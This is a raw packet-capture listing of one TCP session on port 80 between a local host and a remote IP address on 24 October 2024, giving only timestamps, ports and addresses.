Oct 24, 2024 13:54:19.842540026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842556000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842587948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842602015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842622995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842628002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842660904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842664003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842704058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842717886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842770100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842778921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842808008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842816114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842850924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842866898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842901945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842910051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842932940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842945099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.842971087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.842976093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843010902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843039989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843075037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843086004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843112946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843117952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843156099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843166113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843199968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843209028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843230963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843240976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843269110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843275070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843311071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843342066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843375921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843384027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843415976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843420982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843458891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843472958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843508959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843517065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843544960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843549013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843601942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843611956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843646049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843653917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843688011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843697071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843720913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843723059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843764067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843775988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843815088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843818903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843857050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843868971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843913078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843924046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843945980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.843952894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.843985081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844021082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844021082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844022036 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844063044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844079018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844119072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844130039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844168901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844171047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844208956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844211102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844245911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844245911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844280005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844283104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844319105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844321012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844356060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844371080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844403982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844412088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844438076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844448090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844476938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844479084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844512939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844518900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844552040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844556093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844594955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844604015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844636917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844645977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844666958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844676018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844706059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844708920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844742060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844747066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844777107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844783068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844813108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844816923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844851971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844861031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844890118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844892025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844924927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844932079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844960928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.844966888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.844991922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.845002890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.845027924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.845036983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.845063925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.845067978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.845098019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.845103979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.845135927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.889096022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.889127970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.889224052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.889224052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.957753897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.957833052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.957887888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.957909107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.957909107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.957926989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.957969904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.957982063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.957993031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958019018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958050013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958055973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958077908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958102942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958106995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958156109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958163977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958190918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958209991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958244085 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958244085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958280087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958295107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958317995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958349943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958368063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958373070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958408117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958417892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958442926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958452940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958481073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958488941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958515882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958525896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958554983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958555937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958595991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958599091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958631039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958638906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958667040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958674908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958705902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958719969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958750010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958764076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958800077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958801031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958838940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958842993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958874941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958889008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958911896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.958920002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958961964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.958969116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959019899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959022999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959064007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959098101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959141970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959151030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959186077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959202051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959237099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959239960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959274054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959295034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959325075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959351063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959383965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959397078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959419966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959429026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959470034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959472895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959512949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959546089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959651947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959661961 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959734917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959744930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959769011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959778070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959815025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959826946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959861040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959873915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959908962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959913015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959944010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959958076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.959978104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.959990025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960031033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960031033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960062981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960077047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960098028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960103989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960134029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960143089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960170031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960175991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960206985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960213900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960252047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960263014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960304022 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960316896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960366964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960367918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960417032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960422039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960457087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960464001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960493088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960501909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960524082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960535049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960557938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960558891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960594893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960602045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960628033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960637093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960664988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960674047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960699081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960716963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960741997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960746050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960777998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960783958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960814953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960814953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960850000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960859060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960885048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960894108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960925102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960931063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960963964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.960971117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.960999012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.961015940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.961035013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.961044073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.961070061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.961081028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.961112022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.961113930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.961174965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.048512936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.048547983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.048585892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.048612118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073128939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073159933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073204994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073204994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073215008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073251963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073266983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073290110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073292971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073333025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073344946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073379040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073388100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073425055 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073431969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073472977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073484898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073518038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073523045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073549032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073559999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073585033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073590994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073638916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073652983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073678970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073693991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073729038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073735952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073838949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073847055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073888063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073898077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073916912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.073946953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073970079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.073982000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074018002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074028969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074053049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074059963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074090958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074095011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074127913 CEST	80	49714	95.182.96.50	192.168.2.6
